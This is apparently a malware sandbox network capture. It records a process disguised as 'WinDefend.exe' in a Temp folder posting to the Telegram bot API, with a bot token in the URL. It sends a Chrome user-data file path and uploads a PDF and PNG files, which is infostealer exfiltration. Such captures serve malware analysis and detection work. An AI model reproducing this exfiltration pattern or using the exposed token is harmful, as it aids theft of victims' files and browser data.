2024-05-23 13:34:51 UTC	4096	OUT	Data Raw: 25 50 44 46 2d 31 2e 34 0d 25 e2 e3 cf d3 0d 0a 36 37 20 30 20 6f 62 6a 0d 3c 3c 20 0d 2f 4c 69 6e 65 61 72 69 7a 65 64 20 31 20 0d 2f 4f 20 37 30 20 0d 2f 48 20 5b 20 37 35 34 20 31 38 38 20 5d 20 0d 2f 4c 20 34 36 38 39 37 20 0d 2f 45 20 37 30 33 33 20 0d 2f 4e 20 31 31 20 0d 2f 54 20 34 35 34 33 39 20 0d 3e 3e 20 0d 65 6e 64 6f 62 6a 0d 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 78 72 65 66 0d 36 37 20 31 34 20 0d 30 30 30 30 30 30 30 30 31 36 20 30 30 30 30 30 20 6e 0d 0a 30 30 30 30 30 30 30 36 32 37 20 30 30 30 30 30 20 6e 0d 0a 30 30 30 30 30 30 30 37 31 35 20 30 30 30 30 30 20 6e 0d 0a 30 30 30 30 30 30 30 39 34 32 Data Ascii: %PDF-1.4%67 0 obj<< /Linearized 1 /O 70 /H [ 754 188 ] /L 46897 /E 7033 /N 11 /T 45439 >> endobj xref67 14 0000000016 00000 n0000000627 00000 n0000000715 00000 n0000000942
2024-05-23 13:34:51 UTC	4096	OUT	Data Raw: 87 e3 bf 4e 70 4a 50 25 ec 4d 98 49 0c 4a 6c 4e 3c 9e 44 48 4a 49 da 90 74 43 6a 27 95 4b 77 4b 67 92 43 92 97 25 9f 4e a1 a7 64 a7 0c a7 7c 93 ea 99 aa 4f 3d 96 06 a7 25 a7 6d 4c bb bd d0 75 a1 76 e1 78 3a 48 97 a6 6f 4c bf 93 21 c8 a8 c9 f8 43 26 31 33 23 73 24 f3 2f 59 a2 ac 96 ac b3 d9 dc ec e2 ec 3d d9 4f 73 62 73 fa 72 6e e5 ba e7 1a 73 4f e6 31 f3 8a f2 76 e7 3d cb 8f cb ef cf 9f 5c e4 bb 68 d9 a2 f3 05 d6 05 ea 82 23 85 a4 c2 bc c2 9d 85 b3 8b e3 17 6f 5a 3c 5d 14 54 d4 55 74 7d 89 60 49 c3 92 73 4b ad 97 56 2d fd a4 98 59 2c 2b 3e 54 42 28 c9 2f d9 53 f2 83 2c 5d 36 2a 9b 2d 95 96 be 57 3a 23 97 c8 37 cb 1f 2a a2 15 03 8a 07 ca 08 65 bf f2 5e 59 44 59 7f d9 7d 55 84 6a a3 ea 41 79 54 f9 60 f9 23 b5 44 3d ac fe b6 22 a9 62 7b c5 b3 ca f4 ca 0f 2b Data Ascii: NpJP%MIJlN<DHJItCj'KwKgC%Nd\|O=%mLuvx:HoL!C&13#s$/Y=OsbsrnsO1v=\h#oZ<]TUt}`IsKV-Y,+>TB(/S,]6-W:#7e^YDY}UjAyT`#D="b{+
2024-05-23 13:34:51 UTC	4096	OUT	Data Raw: 6c 66 a8 f4 d3 05 3e c9 5e 33 f1 9c 9d 92 9c a2 07 e6 78 98 98 41 76 d1 1e d1 fc de 28 54 d9 17 a7 d5 ec 33 cc b4 06 72 dc fd 1c 78 40 79 e1 66 da 26 76 23 81 c1 0e 65 83 83 a9 77 1c 47 4c 03 37 5d 5b 2d 02 f6 92 c7 82 b2 d0 0d 58 19 6c ff c9 2a e4 8e fc 6f 45 d5 b5 bb a9 b1 78 af 03 87 3a 92 b5 c1 1a da db fb 99 e8 18 8c 60 cd 6e d0 66 f7 09 76 6e 9b 4b 02 cb 27 31 13 9c b8 fd 88 04 8b 59 0f e6 fd 08 d0 73 36 d4 45 7a 0c 04 bb 9b 0e 94 33 b4 d5 26 08 93 09 58 ae ec 26 b8 65 5c 8f 6e 5f 83 65 0d 85 24 01 a2 22 6e 0f f8 9e 2e 81 b1 d5 6c 4f 2d 1d 30 99 6d 36 df db 69 c2 d4 69 b0 b2 aa 73 e3 ec 03 b4 55 34 08 d2 bb 5d af d9 40 cd 69 d7 63 8f 06 aa 91 85 e7 9d 46 16 f4 a0 9a 23 e3 fa 4e 7a 80 f7 ab 5b 43 b1 75 40 b7 1d ef c6 70 58 86 38 71 f8 6d 25 de 7a 4f Data Ascii: lf>^3xAv(T3rx@yf&v#ewGL7][-Xl*oEx:`nfvnK'1Ys6Ez3&X&e\n_e$"n.lO-0m6iisU4]@icF#Nz[Cu@pX8qm%zO
2024-05-23 13:34:51 UTC	4096	OUT	Data Raw: 5e bc 24 47 48 19 36 05 66 17 cc 59 f5 82 b8 c0 24 3f 50 11 b4 a4 16 25 30 55 46 c6 32 21 85 a6 22 47 0b b2 b0 76 cb 44 d7 33 63 41 d5 db 09 cb e8 44 fe de 89 8c 07 a0 5c af 15 19 c1 ae d1 a3 21 5b 96 d1 10 8b ab 49 8f 4a 59 43 b5 97 b2 ef 2c bb 49 77 f1 14 1d d8 e5 44 86 68 b9 82 bd 96 70 d3 18 e0 50 db 8e 7c 58 46 9e ea bb e8 1b 95 66 be 8f be 79 b4 99 73 45 81 34 b1 a3 52 62 10 f5 0b 23 2b 45 1a 75 5b 30 4c b0 16 18 08 6a 0e 68 c8 93 6e 8c cc eb 1d b7 85 99 64 a8 28 9b ae 4e 39 4b 13 76 b5 75 4c 0e 2e 55 28 6c 3e 45 67 16 3d f4 83 d4 50 94 70 15 fe 93 10 d9 88 de 86 06 41 09 78 bd 2d ec 24 18 a1 f8 f0 11 ac 04 df 22 39 79 5c 38 92 93 39 18 9c 2b 90 9c 5a a6 70 2b 3d b2 c3 86 86 03 3d ab b8 10 fb ca f4 b0 0d 41 9a 11 8d 19 43 10 d5 87 c2 d1 35 c8 34 4d Data Ascii: ^$GH6fY$?P%0UF2!"GvD3cAD\![IJYC,IwDhpP\|XFfysE4Rb#+Eu[0Ljhnd(N9KvuL.U(l>Eg=PpAx-$"9y\89+Zp+==AC54M
2024-05-23 13:34:51 UTC	4096	OUT	Data Raw: 37 c4 e9 20 18 12 c0 a2 ba 11 bc 2a 46 98 9d 94 81 88 01 70 d0 8b 53 c2 80 60 9c b2 2d 54 64 f6 60 a3 70 30 1c c8 33 28 6c 9a b8 8b a4 30 a9 68 6d 9b 08 36 21 ba be 1d 04 22 f1 c6 26 cb 4e d3 4b 6c 96 66 8b 44 f0 12 e4 8e 00 2c ae 43 ce 14 19 4a 7f e1 68 a2 5a 5c 17 8c 85 34 9b 57 d1 5b 32 ec 0f 75 20 f5 60 18 a9 14 54 4b 3d f4 79 79 00 46 4e 2e 65 8a be 92 6b 47 34 3a db 06 bd 50 a8 82 66 94 98 fe 13 c7 6b 93 cc 81 6a fc cc b3 3f aa 60 00 f0 c9 cb 51 c0 ad 63 dc 0e a6 47 95 7e ed c2 f1 43 dc 7a f7 f8 08 fe 46 3b ab 15 5a 76 65 90 fd 26 7e e6 ae e0 c5 2c e5 e2 c1 29 52 1c 03 19 bb a9 8c aa 94 81 65 8e dd a0 eb 90 97 8d 70 ea e2 7c 39 1a 67 a8 71 ec 0d c0 05 c0 16 0f 18 94 e2 30 b9 1e 10 ec b7 df 9b 26 40 9a 35 b3 7b bb 88 80 db a5 e0 5c 78 1a 07 97 e6 d2 Data Ascii: 7 *FpS`-Td`p03(l0hm6!"&NKlfD,CJhZ\4W[2u `TK=yyFN.ekG4:Pfkj?`QcG~CzF;Zve&~,)Rep\|9gq0&@5{\x
2024-05-23 13:34:51 UTC	4096	OUT	Data Raw: b8 59 cc 25 b6 33 65 30 b9 03 92 49 4a 6c e7 61 b6 18 3b 32 d4 fc dc 87 43 f6 e8 0b 0b 38 40 1b e0 b4 3c 6b 3a 05 6b 48 50 23 f2 81 5f 9f 28 46 d2 e2 13 4d e4 75 b3 3b 60 25 ac d9 b2 1a 9c 43 57 4e f9 01 27 dc 10 39 40 a8 05 94 4f 0d e8 51 3f 8a 9b ae a0 32 ed 12 ae ba d1 b8 a3 b0 c4 d0 11 7e d9 04 b0 06 95 83 7d 8d 6e 8d 48 80 bd b3 39 a4 37 a8 70 c7 fe 46 7b e9 a4 d1 62 41 b1 22 d8 ba ba 05 ed 06 01 12 0f b5 28 b9 59 1c f1 61 bc bc de fe ba 21 33 73 4e 25 e0 16 4d ca a9 24 0a 5e 7a ea 89 f3 01 83 48 c1 d0 9a 21 38 ed 45 14 ca 40 f0 68 78 9b 84 60 0a 73 8d ea 5c ce 2a a0 cf ea 66 ef ba 47 13 0a ba a7 a7 dc 1b 6a 7e 41 34 cf da 33 f6 9f 05 8e 9b 12 d6 a4 1a 24 75 a4 cf f3 17 f5 8a ce dd 6b c7 7e 64 8b 12 72 16 f4 38 7f 64 b6 0b 5d 8c 39 89 04 d6 90 98 3c Data Ascii: Y%3e0IJla;2C8@<k:kHP#_(FMu;`%CWN'9@OQ?2~}nH97pF{bA"(Ya!3sN%M$^zH!8E@hx`s\*fGj~A43$uk~dr8d]9<
2024-05-23 13:34:51 UTC	4096	OUT	Data Raw: 6f 62 6a 0d 3c 3c 20 0d 2f 43 72 65 61 74 6f 72 56 65 72 73 69 6f 6e 20 39 20 0d 2f 43 6f 6e 74 61 69 6e 65 72 56 65 72 73 69 6f 6e 20 39 20 0d 2f 41 49 4d 65 74 61 44 61 74 61 20 33 30 20 30 20 52 20 0d 3e 3e 20 0d 65 6e 64 6f 62 6a 0d 33 30 20 30 20 6f 62 6a 0d 3c 3c 20 2f 4c 65 6e 67 74 68 20 31 34 32 39 20 3e 3e 20 0d 73 74 72 65 61 6d 0d 0a 25 21 50 53 2d 41 64 6f 62 65 2d 33 2e 30 20 0d 0a 25 25 43 72 65 61 74 6f 72 3a 20 41 64 6f 62 65 20 49 6c 6c 75 73 74 72 61 74 6f 72 28 52 29 20 39 2e 30 0d 0a 25 25 41 49 38 5f 43 72 65 61 74 6f 72 56 65 72 73 69 6f 6e 3a 20 39 2e 30 0d 0a 25 25 46 6f 72 3a 20 28 43 61 72 6c 20 57 20 4f 72 74 68 6c 69 65 62 29 20 28 41 64 6f 62 65 20 53 79 73 74 65 6d 73 20 49 6e 63 6f 72 70 6f 72 61 74 65 64 29 0d 0a 25 25 54 Data Ascii: obj<< /CreatorVersion 9 /ContainerVersion 9 /AIMetaData 30 0 R >> endobj30 0 obj<< /Length 1429 >> stream%!PS-Adobe-3.0 %%Creator: Adobe Illustrator(R) 9.0%%AI8_CreatorVersion: 9.0%%For: (Carl W Orthlieb) (Adobe Systems Incorporated)%%T
2024-05-23 13:34:51 UTC	4096	OUT	Data Raw: 20 0d 65 6e 64 6f 62 6a 0d 33 36 20 30 20 6f 62 6a 0d 3c 3c 20 2f 4c 65 6e 67 74 68 20 31 34 32 31 20 3e 3e 20 0d 73 74 72 65 61 6d 0d 0a 25 21 50 53 2d 41 64 6f 62 65 2d 33 2e 30 20 0d 0a 25 25 43 72 65 61 74 6f 72 3a 20 41 64 6f 62 65 20 49 6c 6c 75 73 74 72 61 74 6f 72 28 52 29 20 39 2e 30 0d 0a 25 25 41 49 38 5f 43 72 65 61 74 6f 72 56 65 72 73 69 6f 6e 3a 20 39 2e 30 0d 0a 25 25 46 6f 72 3a 20 28 43 61 72 6c 20 57 20 4f 72 74 68 6c 69 65 62 29 20 28 41 64 6f 62 65 20 53 79 73 74 65 6d 73 20 49 6e 63 6f 72 70 6f 72 61 74 65 64 29 0d 0a 25 25 54 69 74 6c 65 3a 20 28 44 3a 5c 5c 42 72 61 7a 69 6c 5c 5c 4c 6f 63 61 6c 6b 69 74 5c 5c 43 6f 6d 6d 6f 6e 5c 5c 64 6f 63 73 5c 5c 53 54 41 4d 50 53 5c 5c 50 6f 69 6e 74 65 72 73 2e 70 64 66 29 0d 0a 25 25 43 72 Data Ascii: endobj36 0 obj<< /Length 1421 >> stream%!PS-Adobe-3.0 %%Creator: Adobe Illustrator(R) 9.0%%AI8_CreatorVersion: 9.0%%For: (Carl W Orthlieb) (Adobe Systems Incorporated)%%Title: (D:\\Brazil\\Localkit\\Common\\docs\\STAMPS\\Pointers.pdf)%%Cr
2024-05-23 13:34:52 UTC	405	IN	HTTP/1.1 401 Unauthorized Server: nginx/1.18.0 Date: Thu, 23 May 2024 13:34:52 GMT Content-Type: application/json Content-Length: 58 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":401,"description":"Unauthorized"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
95	192.168.2.5	61135	149.154.167.220	443	4768	C:\Users\user\AppData\Local\Temp\WinDefend.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-23 13:34:51 UTC	196	OUT	POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: api.telegram.org Content-Length: 349 Expect: 100-continue
2024-05-23 13:34:52 UTC	25	IN	HTTP/1.1 100 Continue
2024-05-23 13:34:52 UTC	349	OUT	Data Raw: 63 68 61 74 5f 69 64 3d 31 36 35 35 32 34 30 39 36 37 26 74 65 78 74 3d 46 69 6c 65 25 33 41 2b 31 39 32 2e 70 6e 67 25 30 41 50 61 74 68 25 33 41 2b 43 25 33 41 25 35 43 44 6f 63 75 6d 65 6e 74 73 2b 61 6e 64 2b 53 65 74 74 69 6e 67 73 25 35 43 61 6c 66 6f 6e 73 25 35 43 41 70 70 44 61 74 61 25 35 43 4c 6f 63 61 6c 25 35 43 41 70 70 6c 69 63 61 74 69 6f 6e 2b 44 61 74 61 25 35 43 41 70 70 6c 69 63 61 74 69 6f 6e 2b 44 61 74 61 25 35 43 41 70 70 6c 69 63 61 74 69 6f 6e 2b 44 61 74 61 25 35 43 41 70 70 6c 69 63 61 74 69 6f 6e 2b 44 61 74 61 25 35 43 41 70 70 6c 69 63 61 74 69 6f 6e 2b 44 61 74 61 25 35 43 47 6f 6f 67 6c 65 25 35 43 43 68 72 6f 6d 65 25 35 43 55 73 65 72 2b 44 61 74 61 25 35 43 44 65 66 61 75 6c 74 25 35 43 57 65 62 2b 41 70 70 6c 69 63 61 Data Ascii: chat_id=1655240967&text=File%3A+192.png%0APath%3A+C%3A%5CDocuments+and+Settings%5Cuser%5CAppData%5CLocal%5CApplication+Data%5CApplication+Data%5CApplication+Data%5CApplication+Data%5CApplication+Data%5CGoogle%5CChrome%5CUser+Data%5CDefault%5CWeb+Applica
2024-05-23 13:34:52 UTC	405	IN	HTTP/1.1 401 Unauthorized Server: nginx/1.18.0 Date: Thu, 23 May 2024 13:34:52 GMT Content-Type: application/json Content-Length: 58 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":401,"description":"Unauthorized"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
96	192.168.2.5	61136	149.154.167.220	443	7572	C:\Users\user\AppData\Local\Temp\WinDefend.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-23 13:34:52 UTC	234	OUT	POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary="b22b7fb5-d676-4870-bff8-d4e2876d7f5d" Host: api.telegram.org Content-Length: 29920 Expect: 100-continue
2024-05-23 13:34:52 UTC	25	IN	HTTP/1.1 100 Continue
2024-05-23 13:34:52 UTC	40	OUT	Data Raw: 2d 2d 62 32 32 62 37 66 62 35 2d 64 36 37 36 2d 34 38 37 30 2d 62 66 66 38 2d 64 34 65 32 38 37 36 64 37 66 35 64 0d 0a Data Ascii: --b22b7fb5-d676-4870-bff8-d4e2876d7f5d
2024-05-23 13:34:52 UTC	107	OUT	Data Raw: 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 64 6f 63 75 6d 65 6e 74 3b 20 66 69 6c 65 6e 61 6d 65 3d 63 6f 72 65 5f 69 63 6f 6e 73 2e 70 6e 67 3b 20 66 69 6c 65 6e 61 6d 65 2a 3d 75 74 66 2d 38 27 27 63 6f 72 65 5f 69 63 6f 6e 73 2e 70 6e 67 0d 0a 0d 0a Data Ascii: Content-Disposition: form-data; name=document; filename=core_icons.png; filename*=utf-8''core_icons.png
2024-05-23 13:34:52 UTC	4096	OUT	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 bc 00 00 01 2c 08 06 00 00 00 21 34 60 9d 00 00 00 04 73 42 49 54 08 08 08 08 7c 08 64 88 00 00 00 09 70 48 59 73 00 00 0b 12 00 00 0b 12 01 d2 dd 7e fc 00 00 00 15 74 45 58 74 43 72 65 61 74 69 6f 6e 20 54 69 6d 65 00 34 2f 32 37 2f 31 32 fd 22 3d ed 00 00 00 1c 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 46 69 72 65 77 6f 72 6b 73 20 43 53 36 e8 bc b2 8c 00 00 20 00 49 44 41 54 78 9c ec 9d 7b 7c 1c 55 f9 ff df a7 29 a5 05 4b 5b e4 62 b9 66 0b 88 e5 da d6 4b 17 41 08 95 34 e0 2d 45 14 bf a2 42 2b c4 2a 17 69 d1 0d 4c 25 bd 24 9a b1 59 a0 05 c5 af 10 a1 05 be 80 5c 94 86 8b 10 82 25 c8 57 d8 ea d7 52 6e 02 3f b4 1b 10 28 58 a0 69 2b 6d 5a 92 9c df 1f 67 26 99 6c 76 37 9b 64 77 67 76 fb Data Ascii: PNGIHDR,!4`sBIT\|dpHYs~tEXtCreation Time4/27/12"=tEXtSoftwareAdobe Fireworks CS6 IDATx{\|U)K[bfKA4-EB+*iL%$Y\%WRn?(Xi+mZg&lv7dwgv
2024-05-23 13:34:53 UTC	4096	OUT	Data Raw: b2 63 c7 8e 1d f7 dd 77 df 9f 1f 7a e8 a1 7b fe f6 b7 bf 05 6a ea 61 cb b2 4a 30 3f 56 af 77 75 75 0d d8 cd 61 59 d6 15 f4 76 81 fa 81 3b c8 6c 76 92 7d 57 03 57 d8 b6 fd 1b 77 83 6d db b7 62 04 70 b2 8b 7c 9e f3 da 9a 45 fb 32 62 c6 8c 19 ca 4d 4b 58 b5 6a 15 4f 3d f5 54 4a e1 17 8f c7 7b 66 5a 83 c1 95 32 0b 00 41 7d 02 df 25 71 66 5a 9b 81 89 c6 41 81 89 5d 17 db b6 fb f9 51 08 62 d7 e1 61 7a 07 76 7d d6 9d fd 2e c9 40 b6 d5 5a eb a0 8e 42 87 04 3f 6a 6b 6b 9f 87 a4 03 d9 56 2f 5c b8 30 70 7e 34 36 36 6e c1 dc 03 6e c4 44 da e6 56 55 55 ad 04 7e 89 11 2a 1b 30 79 bb 89 0f 56 81 a3 21 da d0 85 a9 3e f4 57 e0 a3 98 00 cf 1b 98 d4 85 df 63 6a f0 6e 00 be d0 10 6d 08 5e 89 1f 87 86 68 83 c6 44 78 fb 55 36 f0 b0 11 f8 52 43 b4 a1 2d 2f 46 0d 9d 0b 30 13 29 Data Ascii: cwz{jaJ0?VwuuaYv;lv}WWwmbp\|E2bMKXjO=TJ{fZ2A}%qfZA]Qbazv}.@ZB?jkkV/\0p~466nnDVUU~*0yV!>Wcjnm^hDxU6RC-/F0)
2024-05-23 13:34:53 UTC	4096	OUT	Data Raw: 43 91 d8 8c 78 34 dc c7 ae 50 24 36 07 38 0b 93 43 7e 4e 3c 1a ee c8 bf 99 7d 09 45 62 c3 aa d2 30 a9 7a 8d fb a7 af 55 1a d2 e0 46 1d 6e 48 25 76 cb cb cb 47 01 15 f4 8a dd 35 c9 da f9 40 aa 08 6f 41 0a 5e 48 2a 7a c1 23 76 fd b2 6b 00 36 0d dc 24 25 81 52 ef 03 55 94 48 68 db 4e 40 07 e5 b9 f5 76 31 d5 24 d2 7e cf 3d 75 86 c7 07 b5 84 dc bc f9 f3 98 38 71 62 d2 7d 1b 36 6c 60 f9 b2 40 57 48 0d 04 d9 10 bc 3b 81 51 09 db de 05 ce 75 57 1c d1 fb 2d c6 5d 43 ba 00 00 20 00 49 44 41 54 4c 39 9f c4 dc 32 80 ad 59 b0 63 b8 0c e8 87 23 7a 83 ea 47 99 f3 ba 24 d9 ce 43 17 3c f3 d3 11 1f ee e8 e9 66 53 9d 3b cf 38 d4 7a e6 86 d7 ec a9 73 13 9a b6 63 9e da 1f 77 ce b9 32 eb 96 e6 08 cb b2 f6 c4 88 ca 73 80 23 9d cd af 60 2a 1d 64 3a 50 2c 67 c4 a3 e1 8e 50 24 f6 Data Ascii: Cx4P$68C~N<}Eb0zUFnH%vG5@oA^Hz#vk6$%RUHhN@v1$~=u8qb}6l`@WH;QuW-]C IDATL92Yc#zG$C<fS;8zscw2s#`d:P,gP$
2024-05-23 13:34:53 UTC	4096	OUT	Data Raw: ca c6 0b 16 2c 70 ff fc 73 7d 7d fd 49 b9 35 2d 73 3e f5 a9 4f 71 f4 d1 47 73 f7 dd 77 b3 7d fb f6 7e 62 f7 c6 1b 6e f4 db c4 82 20 17 11 de 16 7a bf 60 67 01 db d2 a4 c4 3d 9d 83 f7 1f 36 da 14 ce 4f 95 c3 b7 03 23 76 c1 44 7a 1f f3 cf d2 21 f3 67 cf df 8f 63 4a cc dc 01 ec c4 0c fe 0a 3c 4e c4 3d 91 d1 c0 d5 5a eb a0 74 d7 4e 02 da 13 04 f8 22 8c d8 bd 46 29 75 b5 67 fb 4e 4c e4 f3 6f c0 81 98 14 00 97 17 9d d7 c3 72 68 6b 3a 92 f9 31 14 fc f6 03 30 0f 1d 5a eb 77 33 48 d9 dd ac b5 9e ef a7 ad 99 a0 b5 1e ad b5 be dd c9 15 05 33 00 75 87 ea 1d 79 7f 9b d6 7a f7 00 88 c3 62 a4 0c 40 f5 ad a5 eb e6 ec 2e d6 5a 2f a6 57 4c 96 39 eb ee d2 d3 ed ef 39 de 6d 9b 6f a6 60 ae 71 ef c3 c4 14 ad 75 6b 06 8b 57 a4 bb b9 bf a5 f9 34 3e 0d 43 1d 97 b2 5f 56 ad 18 26 Data Ascii: ,ps}}I5-s>OqGsw}~bn z`g=6O#vDz!gcJ<N=ZtN"F)ugNLorhk:10Zw3H3uyzb@.Z/WL99mo`qukW4>C_V&
2024-05-23 13:34:53 UTC	4096	OUT	Data Raw: 3b 30 b5 b6 b6 b6 2d fb 56 0e 8c 52 ca 8d da f6 f8 31 98 68 ad 47 28 b7 03 53 b7 5c 33 b5 2d fb 56 66 ce e5 d5 97 3f 02 54 64 d0 b4 13 68 58 da b0 f4 27 39 36 69 48 cc 9a 35 6b 31 b0 28 c3 e6 4b 56 ad 5a b5 38 db 36 e4 25 a5 61 e1 c2 85 7b 00 f7 02 67 38 9b 16 2f 5a b4 a8 64 c9 92 25 0b f3 f1 fe 83 20 b1 7b 7f b0 eb 41 62 14 a6 7b f0 8f c0 39 4a a9 2e cf 8d ac 0b 33 28 e4 0f c0 67 81 dd 7d b1 70 00 d2 89 44 30 f9 ba a1 48 ec b3 98 6e a8 23 30 a9 1a 5e 31 e5 3a fc 19 4c ce df c9 39 30 f1 fe 47 75 00 00 20 00 49 44 41 54 33 1b bc 47 fa 87 a4 a0 a7 3c 14 22 ed 18 c1 eb cd b7 9f 00 8c 01 b6 d3 fb b0 b5 67 42 1b f7 ef 7c 57 6b d8 02 6c 04 0e 76 d6 3f 91 a2 dd 38 fa a6 55 fd db 39 36 70 84 22 31 05 fc 37 e6 77 2a e2 15 bb a1 48 ec a3 98 07 f2 c9 98 c8 ef e3 89 Data Ascii: ;0-VR1hG(S\3-Vf?TdhX'96iH5k1(KVZ86%a{g8/Zd% {Ab{9J.3(g}pD0Hn#0^1:L90Gu IDAT3G<"gB\|Wklv?8U96p"17w*H
2024-05-23 13:34:53 UTC	4096	OUT	Data Raw: 19 d4 f6 e2 de fb 5b 81 5b 77 06 6d 23 4e f6 f4 79 18 9f 62 fb 23 93 c9 bc 19 d7 97 75 0e c3 93 c6 1e 5c 3f d9 f5 71 43 94 25 25 e1 cd 3b 6c f9 bd a3 c6 11 37 44 99 de 57 e9 a1 84 57 64 82 54 92 f0 c2 a8 53 0b 7f 39 7f b0 d7 67 57 44 44 64 6c 94 f0 8a 88 88 88 48 aa 55 73 a6 35 11 11 11 11 91 c4 51 c2 2b 22 22 22 22 a9 a6 84 57 44 44 44 44 52 4d 09 af 88 88 88 88 a4 9a 12 5e 11 11 11 11 49 35 25 bc 22 22 22 22 92 6a 4a 78 45 44 44 44 24 d5 94 f0 8a 88 88 88 48 aa 29 e1 15 11 11 11 91 54 53 c2 2b 22 22 22 22 a9 a6 84 57 44 44 44 44 52 4d 09 af 88 88 88 88 a4 9a 12 5e 11 11 11 11 49 35 25 bc 22 22 22 22 92 6a 4a 78 45 44 44 44 24 d5 94 f0 8a 88 88 88 48 aa 29 e1 15 11 11 11 91 54 53 c2 2b 22 22 22 22 a9 a6 84 57 44 44 44 44 52 4d 09 af 88 88 88 88 a4 9a 12 Data Ascii: [[wm#Nyb#u\?qC%%;l7DWWdTS9gWDDdlHUs5Q+""""WDDDDRM^I5%""""jJxEDDD$H)TS+""""WDDDDRM^I5%""""jJxEDDD$H)TS+""""WDDDDRM
2024-05-23 13:34:53 UTC	4096	OUT	Data Raw: 7d bd be b3 f2 71 cc 58 b1 6d 58 1c 25 a6 19 1e 14 f6 ed 1d 8c 63 f7 da b9 75 8b 63 cf 49 27 fd 1e 77 73 5a 25 76 4e bd e3 8e 59 d5 6c 4f 1a 54 9c f0 16 f2 7d ff 6f 70 d3 a0 36 e1 a6 82 1c d3 c0 fa a5 e8 20 2f 8d aa f0 b3 62 ad 3d 1e 37 2b df 3b a3 8b 81 3f 00 af 82 61 13 7f fc 1c 38 d7 18 f3 60 64 fb 09 6b eb 81 20 ba 3f 22 49 eb 60 c2 3b d6 0a 6f 74 db 1d dd ad 65 25 99 d5 50 50 74 18 6c 4b 3e e1 1d 6b 85 37 ba 6d 57 57 57 cd e3 88 53 24 e1 9d 04 ac 0c 7f 0c f0 ed ae ae ae 44 4c f5 5a 4c 91 84 77 44 1c 24 64 ca da bc 4a 68 cd e2 00 00 12 c9 49 44 41 54 68 bb c3 a4 f7 0a dc 15 c1 47 c2 ff df 1c 9d 94 22 1c 8d e1 54 dc 2c 91 47 e3 2a a2 17 65 b3 d9 eb a1 7e df 59 d1 38 c2 a4 77 44 1c d1 49 29 c2 d1 18 46 c4 b1 7b ed dc ba c6 21 d5 57 56 c2 2b 22 63 53 ec Data Ascii: }qXmX%cucI'wsZ%vNYlOT}op6 /b=7+;?a8`dk ?"I`;ote%PPtlK>k7mWWWS$DLZLwD$dJhIDAThG"T,G*e~Y8wDI)F{!WV+"cS
2024-05-23 13:34:53 UTC	916	OUT	Data Raw: 05 dc c1 d0 e8 20 52 3f a5 66 63 fb 28 09 4a 78 d3 a6 30 81 2f 78 ee cc 1a 37 67 bc 36 e0 be c7 ae c0 7d f7 ae 63 68 fc 76 91 52 3a 8b 2c 3f 18 77 cf 4a fe ff 71 2e 41 09 ef 08 d5 e8 d2 d0 82 2b 1e 94 fb d3 44 72 fa be 0e ea 5b b6 e9 f9 be 65 9b 96 e2 12 bf 6b 70 53 d9 be 04 bc 0c 3c 82 ab 3c 9c d0 b7 6c d3 c7 13 98 ec 12 04 c1 23 b8 cb 82 2f 00 9d cd cd cd 3f f0 3c ef 2f 22 cf ff 3e 08 82 ad 97 5d 76 d9 e0 51 dc f3 bc b7 01 77 e1 4e 5a 1e c3 8d e0 50 af 0a ca 6c 5c b7 84 ef 03 8b 71 d3 86 fe 35 6e e4 82 72 2b ce 2f 26 34 d9 2d e6 15 b8 03 e4 d4 d1 56 4c 9a 98 a1 c8 2c 0d 74 33 4b 8c 52 b3 b1 25 71 b8 3e c2 91 0d f2 7f f3 3d c7 6e 2d 79 75 4a 6a 60 67 d0 36 b0 33 68 bb 0e 37 05 ec 00 70 ca ac 8e bb 7f 38 ab e3 ee 24 75 8b 91 64 2a 1c 85 21 aa 95 a1 be ee Data Ascii: R?fc(Jx0/x7g6}chvR:,?wJq.A+Dr[ekpS<<l#/?</">]vQwNZPl\q5nr+/&4-VL,t3KR%q>=n-yuJj`g63h7p8$ud*!
2024-05-23 13:34:53 UTC	405	IN	HTTP/1.1 401 Unauthorized Server: nginx/1.18.0 Date: Thu, 23 May 2024 13:34:53 GMT Content-Type: application/json Content-Length: 58 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":401,"description":"Unauthorized"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
97	192.168.2.5	61137	149.154.167.220	443	4768	C:\Users\user\AppData\Local\Temp\WinDefend.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-23 13:34:52 UTC	233	OUT	POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary="29abcbe2-df31-4261-85ff-4f986c0f4e56" Host: api.telegram.org Content-Length: 7273 Expect: 100-continue
2024-05-23 13:34:53 UTC	25	IN	HTTP/1.1 100 Continue
2024-05-23 13:34:53 UTC	40	OUT	Data Raw: 2d 2d 32 39 61 62 63 62 65 32 2d 64 66 33 31 2d 34 32 36 31 2d 38 35 66 66 2d 34 66 39 38 36 63 30 66 34 65 35 36 0d 0a Data Ascii: --29abcbe2-df31-4261-85ff-4f986c0f4e56
